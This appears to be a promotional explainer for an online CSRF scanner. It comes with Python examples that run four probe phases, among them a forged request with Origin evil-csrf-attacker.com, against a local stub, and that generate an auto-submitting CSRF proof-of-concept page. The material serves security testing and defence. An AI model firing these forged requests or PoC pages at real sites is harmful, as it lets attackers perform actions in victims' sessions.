Not a header checker. A genuine 4-phase CSRF engine that fires real cross-origin forged requests with your session, compares server responses, and generates a working PoC attack page.
Four genuine HTTP phases. Session replay. Response comparison. PoC generator.
Fires four distinct HTTP requests — baseline, no-cred probe, forged+session, no-Origin bypass — and compares actual server responses.
Paste your session cookie string directly. Phase 3 sends it with a forged cross-origin Origin header — exactly how a real CSRF attack works.
Compares HTTP status codes and response body lengths between baseline and forged requests. An equivalent response means the server never checked where the request came from; before calling it exploitable, confirm the replayed body did not already carry a valid CSRF token and that the session cookie is not SameSite-restricted.
Generates a real HTML CSRF proof-of-concept page with auto-submit. Download and open in a browser while logged into the target to validate exploitability.
Detects 8 token patterns (Laravel, Django, Rails, Angular, ASP.NET…) and flags when they exist — reminding you to also verify server-side validation.
Parses every Set-Cookie attribute (SameSite, Secure, HttpOnly) and audits all security headers with per-item pass/warn/fail ratings.
Paste the endpoint and your session cookie from DevTools → Application → Cookies.
The tool fires a legitimate same-origin request with your session to record what a valid server response looks like.
It then sends the identical request with your session but with evil-csrf-attacker.com as the Origin and Referer, the real CSRF scenario.
If the server returns an equivalent 2xx response to both, it did not validate the origin and CSRF protection is missing. A 403, 401 or redirect on the forged request means the origin or a token was checked.
Cross-Site Request Forgery (CSRF) exploits the browser's implicit trust model: when a user visits an attacker-controlled page, the browser automatically attaches the target domain's session cookies to any request it makes to that domain, unless the cookie's SameSite attribute forbids it, even if the request was triggered by the attacker's JavaScript or a hidden HTML form. The server, seeing a request with a valid session cookie, may process it as legitimate without realizing it was forged from a third-party origin.
Most so-called CSRF scanners online are actually just security header auditors. They check whether headers like X-Frame-Options or SameSite are present — useful information, but not a real CSRF test. A genuine CSRF vulnerability check requires firing an actual forged cross-origin HTTP request that carries the victim's session credentials, then observing whether the server accepts or rejects it.
This tool implements a 4-phase real CSRF test. Phase 1 fires a baseline request with a legitimate Origin header and your session cookie, establishing what a valid server response looks like. Phase 2 repeats it without credentials to confirm the endpoint actually depends on the session; if it does not, the comparison is meaningless. Phase 3 is the key test: it sends the identical request body and session cookie but with Origin: https://evil-csrf-attacker.com and Referer: https://evil-csrf-attacker.com/attack.html. If the server returns an equivalent 200 response to both, it accepted a forged cross-origin request and has no CSRF protection. If it returns 403, 401 or a redirect to a login or error page, it rejected the request, whether by checking the origin or by rejecting a token.
Phase 4 sends a request with no Origin header at all. This catches a common defense gap: an application that allows a request when Origin matches its own domain and blocks one when Origin is a different domain, but forgets the case where Origin is absent entirely. Many non-browser clients and some older browsers omit the header, and an attacker who can make the client drop it reaches the unguarded branch. A validator has to treat a missing Origin on a state-changing request as untrusted: fall back to Referer or require a token rather than letting the request through.
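The four phases and the response comparison described in the steps above and in the two preceding paragraphs, as an added example in Python (not the scanner's own code). Everything here is constructed for the demonstration: a stub target with three POST endpoints (/vuln ignores Origin, /strict validates it and also rejects a missing header, /leaky has the Phase 4 gap), a made-up session cookie value, and a urllib client. The stub runs on a local port so the example works offline.

```python
# Added example (not the scanner's own code): a four-phase CSRF probe run
# against a constructed stub server so it works offline. The endpoints,
# cookie value and client are all assumptions made for this demonstration.
import http.server
import threading
import urllib.error
import urllib.request

ATTACKER_ORIGIN = "https://evil-csrf-attacker.com"
SESSION_COOKIE = "session=constructed-session-value"  # constructed, not a real session
BODY = b"email=attacker%40example.com"               # constructed state-changing request


class StubTarget(http.server.BaseHTTPRequestHandler):
    """Constructed target with three POST endpoints:
    /vuln   never looks at Origin.
    /strict allows only its own origin; a missing Origin is rejected too.
    /leaky  blocks foreign origins but forgets the missing-Origin case (Phase 4 gap).
    """
    OWN_ORIGIN = None  # filled in once the server knows its port

    def do_POST(self):
        self.rfile.read(int(self.headers.get("Content-Length", 0)))
        origin = self.headers.get("Origin")
        if "session=" not in self.headers.get("Cookie", ""):
            return self._reply(401, "login required")
        if self.path == "/strict" and origin != self.OWN_ORIGIN:
            return self._reply(403, "bad origin")
        if self.path == "/leaky" and origin is not None and origin != self.OWN_ORIGIN:
            return self._reply(403, "bad origin")
        return self._reply(200, "email updated")

    def _reply(self, code, text):
        data = text.encode()
        self.send_response(code)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):
        pass  # keep the demo quiet


def send(url, headers):
    """Fire one POST and return the (status, body length) pair the phases compare."""
    req = urllib.request.Request(url, data=BODY, method="POST", headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as err:
        return err.code, len(err.read())


def run_phases(url, own_origin):
    """Phase 1 baseline, 2 no credentials, 3 forged origin + session, 4 no Origin header."""
    form = {"Content-Type": "application/x-www-form-urlencoded"}
    evil = {"Origin": ATTACKER_ORIGIN, "Referer": ATTACKER_ORIGIN + "/attack.html"}
    phases = {
        "baseline":  {**form, "Cookie": SESSION_COOKIE, "Origin": own_origin,
                      "Referer": own_origin + "/settings"},
        "no_cred":   {**form, **evil},
        "forged":    {**form, **evil, "Cookie": SESSION_COOKIE},
        "no_origin": {**form, "Cookie": SESSION_COOKIE},  # urllib adds no Origin by itself
    }
    return {name: send(url, hdrs) for name, hdrs in phases.items()}


def verdict(results):
    """Same status and body length as the baseline means the server accepted the probe."""
    baseline = results["baseline"]
    if results["no_cred"] == baseline:
        return "inconclusive: endpoint does not depend on the session"
    if results["forged"] == baseline:
        return "vulnerable: forged cross-origin request accepted"
    if results["no_origin"] == baseline:
        return "vulnerable: missing-Origin request accepted"
    return "protected: cross-origin and missing-Origin requests rejected"


def scan_all():
    """Start the stub, probe each endpoint, and return {path: verdict}."""
    server = http.server.HTTPServer(("127.0.0.1", 0), StubTarget)
    own = "http://127.0.0.1:%d" % server.server_address[1]
    StubTarget.OWN_ORIGIN = own
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return {path: verdict(run_phases(own + path, own))
                for path in ("/vuln", "/strict", "/leaky")}
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for path, result in scan_all().items():
        print(path, "->", result)
```

The no-credential phase is what keeps the comparison honest: an endpoint that answers identically with or without the cookie is not session-bound, so an accepted forged request there says nothing about CSRF. The /leaky endpoint passes Phase 3 and only falls to Phase 4, which is why the missing-Origin probe is sent separately rather than folded into the forged one.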
The tool also generates a real CSRF PoC HTML page that auto-submits a forged form when opened in a browser. This is the standard way penetration testers demonstrate exploitability to clients — not a theoretical finding, but a working proof of concept. Use it only on systems you own or have explicit written authorization to test. Combine this CSRF scanner with XSS testing, CORS analysis, and session management review for a complete web application security assessment.
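An auto-submitting PoC page of the kind described above, as an added example in Python (not the scanner's own generator), paired with a Set-Cookie parser that predicts whether the session cookie would even accompany the forged submission, since a SameSite=Lax or Strict cookie turns a server-side finding into a non-exploitable one in the browser. The target URL, form parameters and cookie strings are constructed for the demonstration.

```python
# Added example (not the scanner's own code): an auto-submitting CSRF PoC
# generator plus a Set-Cookie check that predicts whether the session cookie
# would ride along. Target URL, parameters and cookie strings are constructed.
import html
from urllib.parse import urlsplit


def generate_poc(target_url, params, method="POST"):
    """Build the PoC page. Every attacker-supplied value is HTML-escaped so a
    quote or angle bracket in a parameter cannot break the form itself."""
    def esc(s):
        return html.escape(s, quote=True)

    fields = "\n".join(
        '    <input type="hidden" name="%s" value="%s">' % (esc(k), esc(v))
        for k, v in params.items()
    )
    return (
        "<!DOCTYPE html>\n<html><body>\n"
        '<form id="csrf" action="%s" method="%s">\n%s\n</form>\n'
        "<script>document.getElementById('csrf').submit();</script>\n"
        "</body></html>\n"
    ) % (esc(target_url), esc(method), fields)


def parse_set_cookie(header):
    """Return (cookie name, {lowercased attribute: value}) for one Set-Cookie header."""
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip()
    return name, attrs


def cookie_rides_along(set_cookie, target_url, method="POST"):
    """Predict whether a browser attaches this cookie to the PoC's cross-site
    submission. Returns ("sent" | "blocked" | "browser-dependent", reason)."""
    name, attrs = parse_set_cookie(set_cookie)
    samesite = attrs.get("samesite", "").lower()
    secure = "secure" in attrs
    https = urlsplit(target_url).scheme == "https"
    if samesite == "strict":
        return "blocked", "%s is SameSite=Strict and is never sent cross-site" % name
    if samesite == "none":
        if secure and https:
            return "sent", "%s is SameSite=None; Secure, sent on any cross-site request" % name
        return "blocked", "%s is SameSite=None without Secure/https; browsers reject it" % name
    if samesite == "lax":
        if method.upper() == "GET":
            return "sent", "%s is Lax; sent on a top-level GET navigation" % name
        return "blocked", "%s is Lax; not sent on a cross-site %s" % (name, method.upper())
    # No SameSite attribute: Chromium defaults to Lax (with a short allowance
    # for top-level POST right after the cookie is set); Firefox and Safari send it.
    return "browser-dependent", "%s has no SameSite attribute; verify in each target browser" % name


if __name__ == "__main__":
    url = "https://target.example/settings/email"  # constructed target
    print(generate_poc(url, {"email": "attacker@example.com"}))
    print(cookie_rides_along("session=abc; Path=/; HttpOnly; SameSite=Lax", url))
```

Open the generated file in a browser that holds a live session for the target and watch whether the request lands; if the cookie check says "blocked", a server that ignores Origin is still worth reporting as a defense-in-depth gap, but the PoC will not fire as-is.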